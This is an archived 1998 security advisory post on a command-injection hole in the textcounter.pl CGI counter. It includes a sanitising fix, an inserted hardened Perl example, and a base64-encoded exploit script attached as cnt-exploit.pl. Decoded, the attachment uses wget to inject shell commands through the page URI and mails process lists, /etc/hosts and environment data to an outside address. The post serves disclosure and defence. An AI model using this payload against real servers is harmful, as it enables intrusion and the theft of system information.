textcounter.pl SECURITY HOLE

From: Doru Petrescu (pdoruat_private)
Date: Tue Jun 23 1998 - 22:51:11 PDT


    
    Hi,
    
       I've found a serious problem in the textcounter.pl script that enables
    everybody to execute commands on your system with the same rights as the
    httpd daemon.
       The program was created by Matt Wright (mattwat_private) and
    has a "Last Modified Date" of 5/10/96. You can find it at
    http://www.worldwidemart.com/scripts/.
    
       The counter uses the environment variable DOCUMENT_URI to
    create/read/update a file where it keeps the hit count. There is NO test
    for shell metacharacters, so you can easily put in something evil that will
    make Perl execute it ...
       These are the two lines responsible for the problem ...
    
       if (-e "$data_dir$count_page") {
          open(COUNT,"$data_dir$count_page");   # two-argument open: a name ending in "|" is run as a command
        ....
       }
    
       Because of the test condition, the attack has to be repeated twice to
    succeed. The first time the condition is false and the tricky file gets
    created, and the second time the condition is true and our commands get
    executed ... Nice, isn't it? :(
    
       The fix is very simple: add after line 91 another line that will make
    sure that there are NO tricky characters in the filename.
    
    $count_page = "$ENV{'DOCUMENT_URI'}";         # the original line 91 ....
    $count_page =~ s/([^a-z0-9])/sprintf("%%%02X",ord($1))/ge;   # ADD THIS !!!!!  (ord() gives the byte value; without it sprintf turns every special character into %00)
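As an added example, not part of the original post and not code from Matt Wright's script, here is a hardened version of the counter's file lookup in Perl: it uses the sanitiser from the post (with ord() so sprintf receives the byte value) and replaces the two-argument open with a three-argument open that can never interpret the name as a pipe. The counter directory, the sample URIs and the function names safe_count_name, read_count and bump_count are assumptions made for this demo.

```perl
#!/usr/bin/perl
# Added example, not Matt Wright's textcounter.pl and not the post's attachment:
# a hardened version of the counter's file lookup.
use strict;
use warnings;

# Assumed (hypothetical) counter directory; textcounter.pl's real $data_dir is site-specific.
my $data_dir = "/tmp/textcounter-demo/";

# The post's one-line fix with ord() added, so sprintf gets the character's
# byte value rather than the character itself: every byte outside [a-z0-9]
# becomes %XX. Uppercase letters are encoded too, which is harmless.
sub safe_count_name {
    my ($uri) = @_;
    $uri =~ s/([^a-z0-9])/sprintf("%%%02X", ord($1))/ge;
    return $uri;
}

# Read the current count for a page. Three-argument open with an explicit
# '<' mode treats the name purely as a filename, so a trailing "|" could not
# turn it into a pipe even if the sanitiser were skipped.
sub read_count {
    my ($uri) = @_;
    my $path = $data_dir . safe_count_name($uri);
    return 0 unless -e $path;
    open(my $fh, '<', $path) or die "cannot open $path: $!";
    my $count = <$fh>;
    close($fh);
    return 0 unless defined $count;
    chomp $count;
    return $count =~ /^\d+$/ ? $count : 0;   # ignore a corrupted counter file
}

# Increment and store the count, creating the file on the first hit.
sub bump_count {
    my ($uri) = @_;
    my $count = read_count($uri) + 1;
    my $path  = $data_dir . safe_count_name($uri);
    open(my $fh, '>', $path) or die "cannot write $path: $!";
    print $fh "$count\n";
    close($fh);
    return $count;
}

mkdir $data_dir unless -d $data_dir;

# Constructed inputs: a normal page URI, and one carrying shell
# metacharacters plus a trailing pipe, the shape the post warns about.
# Both end up as plain, harmless file names inside $data_dir.
for my $uri ('/a/test.shtml', '/a/test.shtml;x y|') {
    my $name = safe_count_name($uri);
    my $n    = bump_count($uri);
    printf "%-22s -> %-40s count=%d\n", $uri, $name, $n;
}
```

Run it twice and the counts advance; the second URI never reaches a shell because the encoded name contains only [a-z0-9] and percent escapes, and the three-argument open would refuse to treat even an unencoded trailing "|" as a command.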
    
    
        If you want to make sure whether your system is vulnerable or not, you
    can use the small program that is attached. No cracking please ...
    
    
    Best regards,
    ------
    Doru Petrescu
    KappaNet - Software Engineer
    E-mail: pdoruat_private
    
    ---490663578-807079570-898667471=:9579
    Content-Type: TEXT/PLAIN; charset=US-ASCII; name="cnt-exploit.pl"
    Content-Transfer-Encoding: BASE64
    Content-ID: <Pine.LNX.3.96.980624085111.9579Bat_private>
    Content-Description: counter.pl exploit
    
    IyEvdXNyL2Jpbi9wZXJsDQoNCiRVUkw9J2h0dHA6Ly9kdHAua2FwcGEucm8v
    YS90ZXN0LnNodG1sJzsgICAgIyBwbGVhc2UgX0RPXyBfbW9kaWZ5XyB0aGlz
    IA0KJEVNQUlMPSdwZG9ydUBwb3AzLmthcHBhLnJvLHJvb3QnOyAgIAkgICAg
    IyBwbGVhc2UgX0RPXyBfbW9kaWZ5XyB0aGlzDQoNCg0KaWYgKCRBUkdWWzBd
    KSB7DQogICAkQ01EPSRBUkdWWzBdOw0KfWVsc2V7DQogICAkQ01EPSIocHMg
    YXg7Y2QgLi47Y2QgLi47Y2QgLi47Y2QgZXRjO2NhdCBob3N0cztzZXQpXHxt
    YWlsICR7RU1BSUx9IC1zYW5vdGhlcmVfb25lIjsNCn0NCg0KJHRleHQ9IiR7
    VVJMfS87SUZTPVw4OyR7Q01EfTtlY2hvfCI7DQokdGV4dCA9fiBzLyAvXCRc
    e0lGU1x9L2c7DQoNCiNwcmludCAiJHRleHRcbiI7DQoNCnN5c3RlbSh7Indn
    ZXQifSAid2dldCIsICR0ZXh0LCAiLU8vZGV2L251bGwiKTsNCnN5c3RlbSh7
    IndnZXQifSAid2dldCIsICR0ZXh0LCAiLU8vZGV2L251bGwiKTsNCiNzeXN0
    ZW0oeyJseW54In0gImx5bngiLCAkdGV4dCk7IA0KI3N5c3RlbSh7Imx5bngi
    fSAibHlueCIsICR0ZXh0KTsgICAgICMgaWYgeW91IGRvbid0IGhhdmUgIndn
    ZXQiDQoJCQkJICAjIHlvdSBjYW4gdHJ5IHdpdGggIkx5bngiDQoNCg==
    ---490663578-807079570-898667471=:9579--
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:59:15 PDT